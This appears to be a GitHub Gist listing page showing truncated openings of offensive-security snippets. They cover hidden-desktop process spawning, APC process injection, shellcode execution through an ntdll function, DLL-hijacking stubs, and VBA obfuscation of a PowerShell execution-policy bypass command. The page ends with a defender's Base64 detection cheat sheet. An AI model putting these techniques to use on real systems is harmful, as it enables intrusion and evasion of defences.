Skip to content

Instantly share code, notes, and snippets.

@Mr-Un1k0d3r
Mr-Un1k0d3r / run.c
Created Aug 11, 2021
spawn an invisible process
View run.c
// To compile: gcc64.exe run.c -o run.exe
// To run: run.exe cmd.exe "/c whoami"
#include <Windows.h>
#include <stdio.h>
int main(int argc, char **argv) {
CHAR cDesktop[] = "hiddendesktop";
HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL);
View system32_exports.txt
This file has been truncated, but you can view the full file.
[*] - C:\Windows\System32\1028\VsGraphicsResources.dll
[?] 64-bit Image!
[>] Time Stamp: 12/31/1969 19:00:00
[>] Function Count:
[>] Named Functions:
[>] Ordinal Base:
[>] Function Array RVA: 0x
@rvrsh3ll
rvrsh3ll / DInjectQueuerAPC.cs
Created Nov 20, 2020 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
View DInjectQueuerAPC.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@ropnop
ropnop / go-sharp-loader.go
Created Aug 5, 2020
Example Go file embedding multiple .NET executables
View go-sharp-loader.go
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs are in a "binaries" folder
@TheWover
TheWover / EtwpTest.cs
Created May 6, 2020
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
View EtwpTest.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
{
class Program
{
static void Main(string[] args)
{
@TheWover
TheWover / Find-Assemblies.ps1
Last active Aug 2, 2021
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
View Find-Assemblies.ps1
Param([parameter(Mandatory=$true,
HelpMessage="Directory to search for .NET Assemblies in.")]
$Directory,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
[parameter(Mandatory=$false,
@monoxgas
monoxgas / main.cpp
Created Feb 12, 2020
Adaptive DLL Hijacking - Patching LoadLibrary Return
View main.cpp
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
BOOL PatchTheRet(HMODULE realModule) {
// Get primary module info
@monoxgas
monoxgas / main.cpp
Created Feb 12, 2020
Adapative DLL Hijacking - Stability Hooking
View main.cpp
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
DWORD WINAPI Thread(LPVOID lpParam) {
// Insert evil stuff
ExitProcess(0);
@khr0x40sh
khr0x40sh / Get-VBACHRObfuscatedString.ps1
Created Nov 19, 2019
Takes a string and applies CHR(ascii int) & for each character in string
View Get-VBACHRObfuscatedString.ps1
Param([string]$string = "C:\windows\syswow64\windowspowershell\v1.0\powershell.exe -exec Bypass -nop ping 127.0.0.1"
);
$result = ""
$strA = $string.ToCharArray()
for($i = 0; $i -lt $strA.Length; $i++)
{
$x = [byte]$strA[$i]
$result += "Chr (" + $x.ToString() + ") & "
}
@Neo23x0
Neo23x0 / Base64_CheatSheet.md
Last active Oct 7, 2021
Learning Aid - Top Base64 Encodings Table
View Base64_CheatSheet.md

Learning Aid - Top Base64 Encodings Table

Base64 Code Mnemonic Aid Decoded* Description
JAB 🗣 Jabber $. Variable declaration (UTF-16)
TVq 📺 Television MZ MZ header
SUVY 🚙 SUV IEX PowerShell Invoke Expression
SQBFAF 🐣 Squab favorite I.E. PowerShell Invoke Expression (UTF-16)
SQBuAH 🐣 Squab uahhh I.n. PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA 💪 "Pah!" <. Often used by Emotet (UTF-16)